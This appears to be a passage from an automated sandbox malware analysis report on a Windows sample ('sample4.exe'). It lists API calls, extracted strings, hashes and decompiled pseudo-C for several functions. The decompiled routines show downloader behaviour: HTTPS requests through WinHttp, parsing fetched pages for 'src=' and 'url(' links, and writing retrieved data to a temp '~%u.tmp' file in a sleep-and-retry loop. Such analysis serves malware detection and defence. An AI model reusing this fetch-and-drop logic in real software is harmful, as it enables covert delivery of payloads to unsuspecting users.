DeleteObject.GDI32(00000000), ref: 00147601
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 00147639
lstrcpyW.KERNEL32(?,?), ref: 00147689
EnumFontFamiliesW.GDI32(?,00000000,00146DFB,Segoe UI), ref: 001476B0
lstrcpyW.KERNEL32(?,Segoe UI), ref: 001476C3
EnumFontFamiliesW.GDI32(?,00000000,00146DFB,Tahoma), ref: 001476E1
lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 001476FB
CreateFontIndirectW.GDI32(?), ref: 00147705
CreateFontIndirectW.GDI32(?), ref: 00147756
CreateFontIndirectW.GDI32(?), ref: 00147795
CreateFontIndirectW.GDI32(?), ref: 001477C1
CreateFontIndirectW.GDI32(?), ref: 001477E2
GetSystemMetrics.USER32(00000048), ref: 00147801
lstrcpyW.KERNEL32(?,Marlett), ref: 00147814
CreateFontIndirectW.GDI32(?), ref: 0014781E
GetStockObject.GDI32(00000011), ref: 0014784A
GetObjectW.GDI32(00000000,0000005C,?,?,?,00000000), ref: 00147861
lstrcpyW.KERNEL32(?,Arial), ref: 0014789E
CreateFontIndirectW.GDI32(?), ref: 001478A8
CreateFontIndirectW.GDI32(?), ref: 001478C1
GetStockObject.GDI32(00000011), ref: 001478D5
GetObjectW.GDI32(?,0000005C,?,00000000,?,?,00000000), ref: 001478EA
CreateFontIndirectW.GDI32(?), ref: 001478F8
CreateFontIndirectW.GDI32(?), ref: 00147919

Part of subcall function 00147DB5: __EH_prolog3_GS.LIBCMT ref: 00147DBC
Part of subcall function 00147DB5: GetTextMetricsW.GDI32(?,?,?,00000000,00000054,00147932,00000000,?,?,00000000), ref: 00147DF2
Part of subcall function 00147DB5: GetTextMetricsW.GDI32(?,?,?,?,?,00000000), ref: 00147E33

Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718

Strings

Tahoma, xrefs: 001476CF, 001476EE
Segoe UI, xrefs: 0014769E, 001476BA
Arial, xrefs: 0014788E
MS Sans Serif, xrefs: 001476F5
Marlett, xrefs: 0014780E

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_Stock$CharsetException@8H_prolog3InfoSystemThrow
String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
API String ID: 3775395853-1395034203
Opcode ID: 2edf5d29e05a6702f8c37316214c898aaebec330c42f750d0e5b4405e538e9c6
Instruction ID: d74691be96f236c0fa902587e5cc44353ff4b7288c048167c9975fba58f08f76
Opcode Fuzzy Hash: 2edf5d29e05a6702f8c37316214c898aaebec330c42f750d0e5b4405e538e9c6
Instruction Fuzzy Hash: F6E19FB0A083499BDF11AFB0ED4CBEEBBB8AF55304F004459E559AB2A1DF749984CF11

Uniqueness

Uniqueness Score: -1.00%

Function 000D14EC, Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 206
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000D1517
WinHttpSetStatusCallback.WINHTTP(00000000,?,?,00000000,?,00000000), ref: 000D153D
WinHttpConnect.WINHTTP(00000000,?,?,00000000,?,00000000), ref: 000D154D
WinHttpOpenRequest.WINHTTP(00000000,POST,?,00000000,00000000,00000000,?,?,00000000), ref: 000D158B
WinHttpSetOption.WINHTTP(00000000,0000001F,?,?,?,?,?,00000004,?,00000000), ref: 000D15B2
WinHttpSendRequest.WINHTTP(00000000,?,?,?,?,?,00000000,?,00000000), ref: 000D15CF
WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,00000000), ref: 000D15E1
WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,?,00000000,?,00000000), ref: 000D160F
WinHttpQueryHeaders.WINHTTP(00000000,20000005,00000000,?,?,00000000,?,00000000), ref: 000D1635
GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 000D1649
GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000), ref: 000D166D
RtlReAllocateHeap.NTDLL(00000000,?,00000000), ref: 000D1670
GetProcessHeap.KERNEL32(00000008,?,?,00000000), ref: 000D167A
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 000D167D
WinHttpReadData.WINHTTP(00000000,?,?,?,?,00000000), ref: 000D1697
WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,00000000), ref: 000D16B7
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000000), ref: 000D16D9
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 000D16DC
WinHttpCloseHandle.WINHTTP(00000000,?,00000000), ref: 000D16FE
WinHttpCloseHandle.WINHTTP(?,?,00000000), ref: 000D1708
WinHttpCloseHandle.WINHTTP(00000000,?,00000000), ref: 000D1713

Strings

GET, xrefs: 000D157D, 000D1589
POST, xrefs: 000D1564

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: Http$Heap$Process$CloseHandleQuery$DataHeadersOpenRequest$AllocAllocateAvailableCallbackConnectFreeOptionReadReceiveResponseSendStatus
String ID: GET$POST
API String ID: 3496152665-3192705859
Opcode ID: f0c7e1b3994349f864dc974a657cd9f9b8f679138acc29c0e54f4e8e5b625699
Instruction ID: 8f9113f999cf29f88113894e7362d783796a8ae27b44d4988216095876c55cca
Opcode Fuzzy Hash: f0c7e1b3994349f864dc974a657cd9f9b8f679138acc29c0e54f4e8e5b625699
Instruction Fuzzy Hash: C8612C75104705AFE7208F64DC48B6BBBEDFB88705F044A1EBA96D2261DB78D9088B71

Uniqueness

Uniqueness Score: -1.00%

Function 00118A16, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 00118A23
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,00000000,z(,?,00118C67,00000004,001192CB,00118752,001192F4,0011B475,00119580,?,001196B4), ref: 00118A7B
GlobalHandle.KERNEL32(00000000), ref: 00118A86
GlobalUnWire.KERNEL32(00000000), ref: 00118A8F
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 00118AA8
GlobalFix.KERNEL32(00000000), ref: 00118ABD
RtlLeaveCriticalSection.NTDLL(?), ref: 00118B04
GlobalHandle.KERNEL32(00000000), ref: 00118B16
GlobalFix.KERNEL32(00000000), ref: 00118B1D
RtlLeaveCriticalSection.NTDLL(?), ref: 00118B24

Strings

z(, xrefs: 00118A19

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeave$EnterWire
String ID: z(
API String ID: 1877740037-72658202
Opcode ID: 2701b22e3b876741891e1b470784c8173f01e853be49f771b9c6d26feba5b3b4
Instruction ID: ef388c66d18bcc42c0049a1c14605158dd2b1d2430f74ba9af496e7077a20058
Opcode Fuzzy Hash: 2701b22e3b876741891e1b470784c8173f01e853be49f771b9c6d26feba5b3b4
Instruction Fuzzy Hash: 0131C371600605BFCB08DF64EC89A99B7B8FF55301B20866AE901D3651DFB1F991CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 000D22B0, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 85
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E000D22B0(signed char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v540;
				void* _t29;
				signed char _t38;
				void* _t51;
				intOrPtr _t53;
				void* _t55;

				_t38 = __ecx;
				_v20 = __edx;
				if(E000D216D(0xd465c, 0,  &_v8,  &_v16) == 0) {
					L12:
					return 0;
				}
				_t55 = _v8;
				_push( &_v540);
				_push(_t55);
				if(__ecx == 0) {
					_t51 = 0xd4644;
				} else {
					_t51 = 0xd4650;
				}
				_v12 = E000D2218(_t51);
				if(_t55 != 0) {
					RtlFreeHeap(GetProcessHeap(), 0, _t55); // executed
				}
				if(_v12 != 0) {
					asm("sbb eax, eax");
					_t29 = E000D216D( &_v540,  !( ~(_t38 & 0x000000ff)) & E000D20BA,  &_v8,  &_v16); // executed
					if(_t29 == 0) {
						goto L12;
					}
					_t53 = _v16;
					if(_t53 == 0) {
						goto L12;
					}
					if(_t38 == 0) {
						 *_a4 = _v8;
						 *_a8 = _t53;
						return 1;
					}
					if(_v8 != 0) {
						RtlFreeHeap(GetProcessHeap(), 0, _v8); // executed
					}
				}
			}

0x000d22ba
0x000d22c1
0x000d22dc
0x000d237c
0x00000000
0x000d237c
0x000d22e9
0x000d22ec
0x000d22ed
0x000d22f0
0x000d22fe
0x000d22f2
0x000d22f2
0x000d22f7
0x000d230d
0x000d2314
0x000d2320
0x000d2320
0x000d232b
0x000d2343
0x000d234d
0x000d2357
0x00000000
0x00000000
0x000d2359
0x000d235e
0x00000000
0x00000000
0x000d2362
0x000d2389
0x000d238e
0x00000000
0x000d2392
0x000d2368
0x000d2376
0x000d2376
0x000d2368

APIs

Part of subcall function 000D216D: wsprintfW.USER32 ref: 000D2188

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 000D2319
RtlFreeHeap.NTDLL(00000000,?,?,?), ref: 000D2320
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 000D236F
RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,?), ref: 000D2376

Strings

PF, xrefs: 000D22F2
url(", xrefs: 000D2303
\F, xrefs: 000D22C8
src=", xrefs: 000D22F7
DF, xrefs: 000D22FE

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$wsprintf
String ID: DF$PF$\F$src="$url("
API String ID: 2268164792-905904459
Opcode ID: 4c857e31cc6ddd45ffe3d85bac787102f32b1fec3036ab13c25d2a537aa04c76
Instruction ID: 5a0afe63d70836a3fb3b3549cda6e5cfc2fb53e3a5da991892fb79985cc4ad0d
Opcode Fuzzy Hash: 4c857e31cc6ddd45ffe3d85bac787102f32b1fec3036ab13c25d2a537aa04c76
Instruction Fuzzy Hash: 6021B076A41308ABDF14DBA4C845BEE77F8EB29301F144567AD05A7384EA388E04CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00115BB4, Relevance: 15.1, APIs: 3, Strings: 5, Instructions: 1062sleepCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(forces,0028EA38,0000076D,00006B3E,?), ref: 0011629B
Sleep.KERNELBASE(000005E5), ref: 001167B7
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\sample4.exe,0000076D), ref: 001169C4

Strings

8B(, xrefs: 00116284
forces, xrefs: 00116296
B(, xrefs: 0011625A
-, xrefs: 00115C44, 00115E58, 00116142, 00116195, 001161DE, 00116461, 00116633, 00116675, 001166D6, 00116742, 0011677D, 001167C8, 00116838, 00116A79
C:\Users\user\Desktop\sample4.exe, xrefs: 001169BD

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: EnvironmentFileModuleNameSleepVariable
String ID: B($8B($C:\Users\user\Desktop\sample4.exe$forces$ -
API String ID: 3564984567-255835185
Opcode ID: 577d2c0e55f697fdad6602c7ab2446acd9218c4e0192406c9ab1dc1e728b3b76
Instruction ID: 68bff896be3860165bcbf086622d77affdcfe2aa2d839df50cc3564b3a6b0813
Opcode Fuzzy Hash: 577d2c0e55f697fdad6602c7ab2446acd9218c4e0192406c9ab1dc1e728b3b76
Instruction Fuzzy Hash: 2682E57950A2918FD30CCB35B8A91F67FE5EBA9B15F08052EF4C4873A1D229C789DB11

Uniqueness

Uniqueness Score: -1.00%

Function 000D2395, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E000D2395(intOrPtr __ecx, void* __edx, signed int* _a4, void** _a8) {
				char _v252;
				char _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr _v276;
				void* _v280;
				char _v284;
				void* _v288;
				void* __esi;
				signed int _t25;
				void* _t29;
				void* _t31;
				signed int _t35;
				void** _t45;
				void* _t47;
				void* _t59;
				void* _t62;
				signed int* _t65;
				void** _t67;

				_t67 =  &_v288;
				 *0xd3004 = __ecx;
				_t59 = __edx;
				_t25 = GetTickCount();
				_t65 = _a4;
				_t45 = _a8;
				 *0xd3000 = _t25 & 0x7fffff00;
				 *_t65 =  *_t65 & 0x00000000;
				 *_t45 =  *_t45 & 0x00000000;
				do {
					_t62 = _t59;
					while(_t59 != 0) {
						_t29 = E000D22B0( *((intOrPtr*)(_t62 + 1)), _t62 + 2, _t62, __eflags,  &_v288,  &_v284); // executed
						__eflags = _t29;
						if(_t29 != 0) {
							__eflags =  *_t45;
							if( *_t45 != 0) {
								L6:
								_t47 = _v288;
							} else {
								_v272 = _v272 & 0x00000000;
								_v268 = _v268 & 0x00000000;
								_v264 = _v264 & 0x00000000;
								_v276 = 4;
								_v280 = 0xd3000;
								_t35 = E000D24CF( &_v288);
								__eflags = _t35 - 1;
								if(_t35 != 1) {
									asm("sbb eax, eax");
									_t59 = _t59 &  ~_t35;
									__eflags = _t59;
									goto L6;
								} else {
									 *_t65 = _v268;
									 *_t45 = _v264;
									wsprintfA( &(( &_v260)[GetTempPathA(0x104,  &_v260)]), "~%u.tmp",  *0xd3000);
									_t47 = _v280;
									E000D13E1( &_v252, _t47, _v276);
									_t67 =  &(_t67[4]);
								}
							}
							__eflags = _t47;
							if(_t47 != 0) {
								HeapFree(GetProcessHeap(), 0, _t47);
							}
							_t45 = _a8;
						}
						Sleep(0x1388); // executed
						_t62 = _t62 + ( *_t62 & 0x000000ff);
						__eflags =  *_t62;
						if(__eflags != 0) {
							continue;
						} else {
							goto L11;
						}
						L15:
						return _t31;
					}
					_t31 = 0;
					goto L15;
					L11:
					__eflags =  *_t65;
				} while (__eflags == 0);
				_t31 = 1;
				goto L15;
			}

0x000d2395
0x000d239b
0x000d23a5
0x000d23a7
0x000d23ad
0x000d23b9
0x000d23c0
0x000d23c5
0x000d23c9
0x000d24b3
0x000d24b3
0x000d24b5
0x000d23e1
0x000d23e8
0x000d23ea
0x000d23f0
0x000d23f3
0x000d2479
0x000d2479
0x000d23f9
0x000d23f9
0x000d2402
0x000d2407
0x000d240c
0x000d2414
0x000d241c
0x000d2421
0x000d2424
0x000d2475
0x000d2477
0x000d2477
0x00000000
0x000d2426
0x000d242a
0x000d2431
0x000d2455
0x000d245f
0x000d2469
0x000d246e
0x000d246e
0x000d2424
0x000d247d
0x000d247f
0x000d248b
0x000d248b
0x000d2491
0x000d2491
0x000d249d
0x000d24a6
0x000d24a8
0x000d24ab
0x00000000
0x00000000
0x00000000
0x00000000
0x000d24bf
0x000d24c9
0x000d24c9
0x000d24bd
0x00000000
0x000d24ad
0x000d24ad
0x000d24ad
0x000d24cc
0x00000000

APIs

GetTickCount.KERNEL32 ref: 000D23A7
GetTempPathA.KERNEL32(00000104,?), ref: 000D243D
wsprintfA.USER32 ref: 000D2455
GetProcessHeap.KERNEL32(00000000,?), ref: 000D2484
HeapFree.KERNEL32(00000000), ref: 000D248B
Sleep.KERNELBASE(00001388), ref: 000D249D

Strings

~%u.tmp, xrefs: 000D244F

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: Heap$CountFreePathProcessSleepTempTickwsprintf
String ID: ~%u.tmp
API String ID: 1386548744-3559650149
Opcode ID: 87f80acff3db17a6b88d8737bd65a9b4f2a0c722edf5b88f0979059dd8b34118
Instruction ID: 446ebb5d4ded9fa42c13a4de753ed44d9090c2b7285d573c7329956c4c146fee
Opcode Fuzzy Hash: 87f80acff3db17a6b88d8737bd65a9b4f2a0c722edf5b88f0979059dd8b34118
Instruction Fuzzy Hash: 603181725093419FE720DF60D884BAA7BE4FB98315F00491BFA9987281DB789648CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0014700B, Relevance: 6.1, APIs: 4, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 00147068
VerSetConditionMask.NTDLL(00000000), ref: 00147070
VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 00147081
GetSystemMetrics.USER32(00001000), ref: 00147092

Part of subcall function 00147998: __EH_prolog3.LIBCMT ref: 0014799F
Part of subcall function 00147998: GetSysColor.USER32(00000016), ref: 001479A8
Part of subcall function 00147998: GetSysColor.USER32(0000000F), ref: 001479BB
Part of subcall function 00147998: GetSysColor.USER32(00000015), ref: 001479D2
Part of subcall function 00147998: GetSysColor.USER32(0000000F), ref: 001479DE
Part of subcall function 00147998: GetSysColor.USER32(0000000F), ref: 00147A14
Part of subcall function 00147998: GetSysColor.USER32(00000010), ref: 00147A22
Part of subcall function 00147998: GetSysColor.USER32(00000015), ref: 00147A30
Part of subcall function 00147998: GetSysColor.USER32(00000016), ref: 00147A3E
Part of subcall function 00147998: GetSysColor.USER32(00000014), ref: 00147A4C
Part of subcall function 00147998: GetSysColor.USER32(00000012), ref: 00147A5A
Part of subcall function 00147998: GetSysColor.USER32(00000011), ref: 00147A68
Part of subcall function 00147998: GetSysColor.USER32(00000006), ref: 00147A73
Part of subcall function 00147998: GetSysColor.USER32(0000000D), ref: 00147A7E
Part of subcall function 00147998: GetSysColor.USER32(0000000E), ref: 00147A89
Part of subcall function 00147998: GetSysColor.USER32(00000005), ref: 00147A94
Part of subcall function 00147998: GetSysColor.USER32(00000008), ref: 00147AA2
Part of subcall function 00147998: GetSysColor.USER32(00000009), ref: 00147AAD
Part of subcall function 00147998: GetSysColor.USER32(00000007), ref: 00147AB8
Part of subcall function 00147998: GetSysColor.USER32(00000002), ref: 00147AC3
Part of subcall function 00147998: GetSysColor.USER32(00000003), ref: 00147ACE
Part of subcall function 00147998: GetSysColor.USER32(0000001B), ref: 00147ADC
Part of subcall function 00147998: GetSysColor.USER32(0000001C), ref: 00147AEA
Part of subcall function 00147998: GetSysColor.USER32(0000000A), ref: 00147AF8

Part of subcall function 0014745F: __EH_prolog3_GS.LIBCMT ref: 00147469
Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 001474F3
Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 00147511
Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 0014752F
Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 0014754D
Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 0014756B
Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 00147589
Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 001475A7

Part of subcall function 001470F2: GetSystemMetrics.USER32(00000031), ref: 00147100
Part of subcall function 001470F2: GetSystemMetrics.USER32(00000032), ref: 0014710E
Part of subcall function 001470F2: SetRectEmpty.USER32(00289F9C), ref: 00147121
Part of subcall function 001470F2: EnumDisplayMonitors.USER32(00000000,00000000,00146F86,00289F9C), ref: 00147131
Part of subcall function 001470F2: SystemParametersInfoW.USER32(00000030,00000000,00289F9C,00000000), ref: 00147140
Part of subcall function 001470F2: SystemParametersInfoW.USER32(00001002,00000000,00289FC0,00000000), ref: 0014716D
Part of subcall function 001470F2: SystemParametersInfoW.USER32(00001012,00000000,00289FC4,00000000), ref: 00147181
Part of subcall function 001470F2: SystemParametersInfoW.USER32(0000100A,00000000,00289FD4,00000000), ref: 001471A7

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Color$DeleteObjectSystem$Info$Parameters$Metrics$ConditionMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
String ID:
API String ID: 1890856596-0
Opcode ID: 6136cea3a1162b5ff4e53f175a75a6cbdaab76b754c9d4025c533c7621b89239
Instruction ID: 65de4ea97668bddf28633e736fa0766a13be9dacf7385398a8b95b4fa96ffbd0
Opcode Fuzzy Hash: 6136cea3a1162b5ff4e53f175a75a6cbdaab76b754c9d4025c533c7621b89239
Instruction Fuzzy Hash: 1811A3B0A00218ABD725AF75EC4AFEFB7BCEB89700F00445DF64697281DBB04A448F90

Uniqueness

Uniqueness Score: -1.00%

Function 00112F27, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,002A2E80,00000469), ref: 00112FF0
VirtualProtect.KERNELBASE(00002100,00000040,0028F660), ref: 00113078

Strings

-, xrefs: 001130F9

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: FileModuleNameProtectVirtual
String ID: -
API String ID: 2744891222-879422539
Opcode ID: 5a9ff88032a6544f5b7a07fdf2ea6dc54a300e9c4792e4ae5c1db1a581449a34
Instruction ID: 9b05f4a448642d7419760f0e7e6a2e2df09dcd47a8f782c50f1039cfb966764c
Opcode Fuzzy Hash: 5a9ff88032a6544f5b7a07fdf2ea6dc54a300e9c4792e4ae5c1db1a581449a34
Instruction Fuzzy Hash: 0B51D53A50A1909BD30DDB39BDAE2F17FE4D726B15B04006EF4C0873A2D168879AE711

Uniqueness

Uniqueness Score: -1.00%

Function 00118C1C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00118C23

Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718

Strings

z(, xrefs: 00118C43
z(, xrefs: 00118C3A, 00118C57, 00118C6F, 00118C8B

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID: z($z(
API String ID: 3670251406-2249586295
Opcode ID: bb719ec3cebfba113984461a303682d72f460f32d76a7d5d339df6d31f1d1c93
Instruction ID: dc06b4a80ab3ddb213f239ba264ad0af754e76af3b453759c1c4e3d93d92c8f7
Opcode Fuzzy Hash: bb719ec3cebfba113984461a303682d72f460f32d76a7d5d339df6d31f1d1c93
Instruction Fuzzy Hash: F20184396226059BCB2CAF64D8557E976A6AF60394F20803CE5519B290DF30CDC1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 000D216D, Relevance: 4.6, APIs: 3, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000D216D(intOrPtr __edx, intOrPtr _a4, void** _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				short _v28;
				long _v32;
				intOrPtr _v36;
				char _v40;
				short _v168;
				void* __ecx;
				intOrPtr _t22;
				void* _t30;
				intOrPtr* _t35;
				intOrPtr _t36;
				void** _t37;

				_t36 = __edx;
				wsprintfW( &_v168, 0xd4634, _t30);
				_v36 = _t36;
				_v40 =  &_v168;
				_v32 = 0;
				_v28 = 0x1bb;
				_t22 = _a4;
				_v24 = 1;
				_v20 = 0;
				_v16 = 0;
				if(_t22 == 0) {
					_v8 = 0;
					_v12 = 0;
				} else {
					_v8 = 0x30;
					_v12 = _t22;
				}
				_t37 = _a8;
				_t35 = _a12;
				 *_t37 = 0;
				 *_t35 = 0;
				if(E000D14EC( &_v40, _t37, _t35) != 0xc8) {
					if( *_t37 != 0 &&  *_t35 != 0) {
						RtlFreeHeap(GetProcessHeap(), 0,  *_t37); // executed
					}
					 *_t37 = 0;
					 *_t35 = 0;
					return 0;
				} else {
					return 1;
				}
			}

0x000d2180
0x000d2188
0x000d2194
0x000d2197
0x000d21a1
0x000d21a4
0x000d21ab
0x000d21ae
0x000d21b5
0x000d21b8
0x000d21bd
0x000d21cb
0x000d21ce
0x000d21bf
0x000d21bf
0x000d21c6
0x000d21c6
0x000d21d1
0x000d21d7
0x000d21dd
0x000d21df
0x000d21ec
0x000d21f5
0x000d2205
0x000d2205
0x000d220b
0x000d220f
0x00000000
0x000d21ee
0x00000000
0x000d21f0

APIs

wsprintfW.USER32 ref: 000D2188
GetProcessHeap.KERNEL32(00000000,?), ref: 000D21FE
RtlFreeHeap.NTDLL(00000000), ref: 000D2205

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcesswsprintf
String ID:
API String ID: 617260705-0
Opcode ID: f73bb150b0d3730ecba67fa0bb79b73dc9fea27eab891844bfd4dfff17de4bd0
Instruction ID: 9765d2e839c0c5077732cd3262e757037fe433dd6f7fc83021dc3a56cc0987c8
Opcode Fuzzy Hash: f73bb150b0d3730ecba67fa0bb79b73dc9fea27eab891844bfd4dfff17de4bd0
Instruction Fuzzy Hash: E9212C7590130AAFDB208F95C98459EFBF8FF59310F20446EE989A3300D3748A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000D13D3, Relevance: 3.0, APIs: 2, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				void* _t3;

				E000D12F9(_t2, _t3); // executed
				ExitProcess(0);
			}

0x000d13d3
0x000d13da

APIs

ExitProcess.KERNEL32 ref: 000D13DA

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 72a0fa4d59ccd06826519b29c3e4db74ecaa906e3bcce2c533f7ae327f148f6c
Instruction ID: 080c1795c6e2273de0c0b223f7e761cd257d9cca83dedd1a75cdafd44742822b
Opcode Fuzzy Hash: 72a0fa4d59ccd06826519b29c3e4db74ecaa906e3bcce2c533f7ae327f148f6c
Instruction Fuzzy Hash: 9490023414520167E5402761590A7982A245B00702F000002B709A55934D7900114571

Uniqueness

Uniqueness Score: -1.00%

Function 013003A6, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 013003DF

Memory Dump Source

Source File: 00000000.00000002.568355205.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1300000_sample4.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction ID: beff9b76e323ed4c692bafdf9a92360b2230dac477543b58950e867f5bac8917
Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction Fuzzy Hash: 05012873A001086BF72B8A0CDD01B7B77D8EFC47A8F19C165F916EB2C2C670D80145A4

Uniqueness

Uniqueness Score: -1.00%

Function 0025B054, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0025B095

Memory Dump Source

